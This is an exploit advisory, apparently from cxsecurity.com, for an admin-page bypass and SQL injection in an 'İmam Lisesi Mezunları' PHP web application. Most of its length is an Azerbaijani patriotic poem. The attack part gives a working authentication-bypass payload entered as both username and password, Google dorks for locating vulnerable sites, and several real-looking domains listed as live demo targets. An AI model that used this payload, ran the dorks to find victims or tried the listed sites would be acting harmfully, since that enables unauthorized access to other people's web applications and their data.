İmam Lisesi Mezunları Admin Page Bypass & SQL injection

2016.12.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Admin Page Bypass & SQL injection |[+] |[+] Exploit Author : Azerbaycanli Hacker #By.SaMiR |[+] |[+] Google Dork:"İmam Lisesi Mezunları" |[+] |[+] Google Dork:"İmam Lisesi Mezunları" inurl:php?id= |[+] |[+] Tested on: Windows 7 |[+] |[+] Date: 27/12/2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Username: '=' 'or' |[+] Password: '=' 'or' |[+] |[+] Admin Url :- |[+] |[+] http://Site.com/admin/login.php |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+]http://www.zihmender.com/admin/login.php |[+]http://www.bihmezder.org/admin/login.php |[+]http://www.eyupihlmezder.com/admin/login.php |[+]http://www.liderkihl.com/admin/login.php |[+] |[+]Bu Siteler Uyarildi |--------------------------------------------------------------| |[+] Thanks: CXSECURITY.COM Team's Members |[+] |[+] Bəxtiyar Vahabzadə – AZƏRBAYCAN-TÜRKİYƏ |[+] Bir ananın iki oğlu, |[+] Bir amalın iki qolu. |[+] O da ulu, bu da ulu |[+] Azərbaycan-Türkiyə. |[+] |[+] Dinimiz bir, dilimiz bir, |[+] Ayımız bir, ilimiz bir, |[+] Eşqimiz bir, yolumuz bir |[+] Azərbaycan-Türkiyə. |[+] |[+] Bir millətik, iki dövlət |[+] Eyni arzu, eyni niyyət. |[+] Hər ikisi cümhuriyyət |[+] Azərbaycan-Türkiyə. |[+] |[+] Birdir bizim hər halımız— |[+] Sevincimiz-məlalımız. |[+] Bayraqlarda hilalımız |[+] Azərbaycan-Türkiyə. |[+] |[+] Ana yurdda-yuva qurdum, |[+] Ata yurda könül verdim. |[+] Ana yurdum, ata yurdum |[+] Azərbaycan-Türkiyə. |[+] |[+] Url : http://pagebin.com/G2V7JVOW |[+] |--------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top